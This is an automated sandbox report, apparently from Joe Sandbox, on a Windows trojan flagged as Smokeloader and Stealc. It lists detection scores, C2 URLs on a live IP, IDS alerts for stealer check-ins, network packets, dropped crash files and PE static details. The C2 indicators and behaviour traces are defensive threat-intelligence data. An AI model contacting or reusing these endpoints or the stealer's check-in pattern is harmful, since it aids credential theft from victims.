Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	43 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
w7kdnBzGat.exe	63%	ReversingLabs	Win32.Trojan.Smokeloader
w7kdnBzGat.exe	50%	Virustotal		Browse
w7kdnBzGat.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://23.88.106.134/c73eed764cc59dcb.php.0//EN	100%	Avira URL Cloud	malware
http://23.88.106.134/84bad7132df89fd7/sqlite3.dll	100%	Avira URL Cloud	malware
http://23.88.106.134	100%	Avira URL Cloud	malware
http://23.88.106.134/c73eed764cc59dcb.php	100%	Avira URL Cloud	malware
http://23.88.106.134/c73eed764cc59dcb.phpxKr	100%	Avira URL Cloud	malware
http://23.88.106.134/c73eed764cc59dcb.phpininit.exe	100%	Avira URL Cloud	malware
http://23.88.106.134/c73eed764cc59dcb.php	0%	Virustotal		Browse
http://23.88.106.134	14%	Virustotal		Browse
http://23.88.106.134/84bad7132df89fd7/sqlite3.dll	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.88.106.134/84bad7132df89fd7/sqlite3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/c73eed764cc59dcb.php	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
http://23.88.106.134/c73eed764cc59dcb.php.0//EN	RegAsm.exe, 00000001.00000002.2034339347.0000000000550000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/c73eed764cc59dcb.phpxKr	RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134	RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/c73eed764cc59dcb.phpininit.exe	RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.88.106.134	unknown	United States		18978	ENZUINC-US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448026
Start date and time:	2024-05-27 14:52:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	w7kdnBzGat.exe renamed because original name is a hash value
Original Sample Name:	b4ffec30abb0de7d297eb9b20b7c02e3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 48 Number of non-executed functions: 194
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:53:21	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.88.106.134	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	23.88.106.134/c73eed764cc59dcb.php
23.88.106.134	sSX92EpKXA.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134/c73eed764cc59dcb.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ENZUINC-US	C4zDQjrSzj.elf	Get hash	malicious	Unknown	Browse	104.202.16.149
	bWT2t63tyx.elf	Get hash	malicious	Mirai	Browse	23.88.52.205
	https://actualizacionesban-colombia.brizy.site/	Get hash	malicious	Unknown	Browse	23.88.86.2
	https://fix-walletconnect.pages.dev/wallet	Get hash	malicious	Unknown	Browse	23.88.86.2
	http://jaz.wxk.mybluehost.me/ch/104c5	Get hash	malicious	Unknown	Browse	23.88.86.2
	http://jaz.wxk.mybluehost.me/ch/e4ab7	Get hash	malicious	Unknown	Browse	23.88.86.2
	http://jaz.wxk.mybluehost.me/ch/e4ab7	Get hash	malicious	Unknown	Browse	23.88.86.2
	icLkiPQcn4.elf	Get hash	malicious	Mirai	Browse	104.203.199.85
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	23.88.106.134
	sSX92EpKXA.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w7kdnBzGat.exe_3c8c512cf549e9ce237cc88c2aab5759f36d91_ed2726f5_58e1a148-72c3-4395-902b-3ee4fba2d5b4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6762783464580949
Encrypted:	false
SSDEEP:	192:WXnseF3ese/WreVredl0aTlQeKeHjSzuiFYZ24IO8aeVex:ast/WCVCdGaTlx7HjSzuiFYY4IO8L8x
MD5:	79D15C2C93390BF2C65B021B1C8F0BE7
SHA1:	2D29A853619C078926AD6B67D9E61758C00E8A04
SHA-256:	73FA2F10DCBA2006EDF0002E5B7EED6B261129C1F2CC4CE634A1B33C9029A2A7
SHA-512:	B992A5FEA27185081FE7886951D9CAA1112160673244835507C6F7A402E4AB0F9EE08B60ACF60C1D50EAA2518F965C35779E84CB25446E987D7F07EC1975B1E6
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.8.7.9.8.7.5.3.3.1.1.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.8.7.9.8.7.8.4.5.6.1.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.e.1.a.1.4.8.-.7.2.c.3.-.4.3.9.5.-.9.0.2.b.-.3.e.e.4.f.b.a.2.d.5.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.0.6.c.7.7.0.-.4.f.0.c.-.4.f.b.3.-.9.f.f.5.-.7.b.6.8.1.5.0.c.9.5.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.7.k.d.n.B.z.G.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.c.0.-.0.0.0.1.-.0.0.1.4.-.c.0.5.a.-.1.3.c.d.3.4.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.4.8.8.6.e.e.7.5.f.7.4.b.0.8.f.6.c.0.a.5.c.8.5.8.3.f.2.7.a.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.d.7.6.f.4.e.9.5.8.6.5.d.b.f.8.2.9.1.b.a.2.a.0.7.3.b.5.6.9.4.1.c.d.0.f.0.f.8.2.2.!.w.7.k.d.n.B.z.G.a.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD38.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 27 12:53:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	33904
Entropy (8bit):	1.747656862174382
Encrypted:	false
SSDEEP:	96:5480sm+RAiQDkKOe9i7ywwQp3CAq5k+rD3Hy3JIyMlsQ0dv4WIkWI7IIUdnaCsIk:lNe9OaU1+rD3+qgudnaCsIoN
MD5:	CDB909F3915B03A3A2CF79AB347E28D3
SHA1:	A313D8FFAD9DD400C256DB6BF6A4ADB9608A42A3
SHA-256:	561BF10EDB35C13F6D87D631D19A88C2ABBC559465C7F8115C79BD0FFDC6080B
SHA-512:	5CDF81B1FD07BDB7DF9909DF985BDFD53268AB1DA083C44CA67FAAD7BBE625B8A48780835956E87C5D83AEC8ECFED170EE36379543AF5C960C5FE58F1C309836
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......3.Tf........................................J...........T.......8...........T...............py..........D...........0...............................................................................eJ..............GenuineIntel............T...........*.Tf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD87.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.6938770319895466
Encrypted:	false
SSDEEP:	192:R6l7wVeJ4eSs6L6YEIFSU9RdzgmfYedeiXf7pDO89bWbKsf+3wjm:R6lXJZJ6L6YEqSU9Rdzgmf5EiXfpWbpW
MD5:	A4E48179558DA3EB108837CF5EFE7CC3
SHA1:	BC9585B9D8E9C87916DE6D7E69F93BB7FF87BC32
SHA-256:	F6912C4C43C1D02971FBA719285979E61B5A88263163A4152BE04EB51F9FE30C
SHA-512:	C21F707FFBC0135F5F6690CFED2713EA20DC4964E19731955B54BBB3C3BC71356C80BDA40294ABC9D095667431F4E904F196975649CCD567CD7CE9EEEE7F749F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDD6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.451402737810149
Encrypted:	false
SSDEEP:	96:uIjf3I7AoKe7VSJ/EZ6ZtKMZ6ZNtqznMKMud:uIDYRl7okOZONQMNE
MD5:	B5A0BB472AB79F1CA793DA73985D30BE
SHA1:	290649444FFBA645B646F1EE60445EC034CF814C
SHA-256:	7A32F25E8337AC8C394AF2F894C19D0760EC306394C1E3D0CB8D3C38B8017E5C
SHA-512:	79CC08A7E247D532CA67F4D124BD723D8FB157BDB417D301041FC7A064A2A1F65867907AF956BEA8B0274610F56BF0ABEA5AAE8CD6CD389CF52C2E3AE6BF410B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="341515" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.42156960752149
Encrypted:	false
SSDEEP:	6144:CSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNm0uhiTw:RvloTMW+EZMM6DFyY03w
MD5:	C05549E40F50153A374703BBC0ED1C30
SHA1:	4674058FCF6C9523564AC5E1F9DE60AC97194D99
SHA-256:	0F53509A027B0FE018662AD769F8D8453D2848CD5E84005789DBD27E849A4FAA
SHA-512:	B6ED053640C7BE5D27BAD91E8C6661C5100FC631D2C114338CE0A44702ECA155445E694BD0403751544B0F8105F16A3CA4F57F959CF3F455BDA283C067E39C27
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.2Z.4................................................................................................................................................................................................................................................................................................................................................HL.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.073071814296369
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	w7kdnBzGat.exe
File size:	779'264 bytes
MD5:	b4ffec30abb0de7d297eb9b20b7c02e3
SHA1:	d76f4e95865dbf8291ba2a073b56941cd0f0f822
SHA256:	3d0b4757cc7790b45bcf440913e3e82bdf5107dc103fd2f392461dc59ee0a6db
SHA512:	9f244a905f26966f9f099f15a57ef74e8449a31d8e9fd22fcd8c916a8c3b31e73602a6e40e744a2c59938dc1c05771c39d3cbf09f45b4e44b589cfd1a38272c1
SSDEEP:	12288:UtASL4Dwt7jcpgn3MhGSt5j9C5WTn6WHsLErFsbqGBuG97GWHrSxZrcuJm1w:UtASL4DWjcpgn3M4qPkWTn6WHsLEgDlj
TLSH:	86F4BE1275C0803AEA3321320A65F3799ABFF4701B2596DF13D85A7E5F746C1AF2126B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..sV..sV..sV...U..sV...S.csV...R..sV...R..sV...U..sV...W..sV..sW..sV...S..sV.:._..sV.:.T..sV.Rich.sV........................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x427e55
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66531972 [Sun May 26 11:13:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b52109efdb3a4c9e783d60533258ffa2

Entrypoint Preview

Instruction
call 00007F634D16527Dh
jmp 00007F634D164318h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F634D1641B5h
jmp 00007F634D1644D2h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F634D1641A6h
jmp 00007F634D1644C3h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00494040h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00494040h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00494040h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x932f8	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbd000	0x48c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8cdd8	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8cd18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x83000	0x1f4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x80b25	0x80c00	d063f8dd8b7b487f958ec2a054993806	False	0.4156761984223301	data	6.669794774131412	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bsS	0x82000	0x33a	0x400	42c7633662e7b7111c44208b310f654f	False	0.716796875	data	5.7268902642513995	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x83000	0x10ef6	0x11000	2de66e5af7818951ede7b701c0f58145	False	0.3790067784926471	data	4.803553324084499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x94000	0x28d5c	0x27600	2a8e5d6004203e0d55462c27eb2a5931	False	0.9632130456349206	data	7.961376480855413	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xbd000	0x48c8	0x4a00	35fdb01d6f207bd1afdb057666021a24	False	0.7421347128378378	data	6.619190519115159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

ADVAPI32.dll

GetNumberOfEventLogRecords

KERNEL32.dll

VirtualAlloc, WaitForSingleObjectEx, CreateThread, FormatMessageA, GetCurrentThreadId, CloseHandle, Sleep, SwitchToThread, GetExitCodeThread, GetNativeSystemInfo, EncodePointer, DecodePointer, LocalFree, GetLocaleInfoEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, SetFileInformationByHandle, GetTempPathW, InitOnceExecuteOnce, CreateEventExW, CreateSemaphoreExW, FlushProcessWriteBuffers, GetCurrentProcessorNumber, GetSystemTimeAsFileTime, GetTickCount64, FreeLibraryWhenCallbackReturns, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForThreadpoolTimerCallbacks, CloseThreadpoolTimer, CreateThreadpoolWait, SetThreadpoolWait, CloseThreadpoolWait, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, CreateSymbolicLinkW, GetStringTypeW, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, HeapAlloc, HeapFree, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, SetConsoleCtrlHandler, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/27/24-14:53:00.307637	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49704	80	192.168.2.5	23.88.106.134
05/27/24-14:53:00.964543	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49704	80	192.168.2.5	23.88.106.134
05/27/24-14:53:01.204223	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49704	80	192.168.2.5	23.88.106.134

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 14:53:00.302231073 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:00.307306051 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:00.307460070 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:00.307636976 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:00.312576056 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:00.962945938 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:00.963107109 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:00.964543104 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:00.972647905 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.166105032 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.166348934 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.204222918 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.209306955 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.404856920 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.405190945 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.423629999 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.423629999 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.428595066 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.428714037 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.428741932 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.428770065 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.428802967 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.428911924 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.429183006 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.627767086 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.627891064 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.660763025 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:01.666249037 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.863326073 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:01.863502026 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:02.042164087 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:02.047303915 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.238768101 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.238976955 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:02.240724087 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:02.245620966 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.437469959 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.437661886 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:02.439212084 CEST	49704	80	192.168.2.5	23.88.106.134
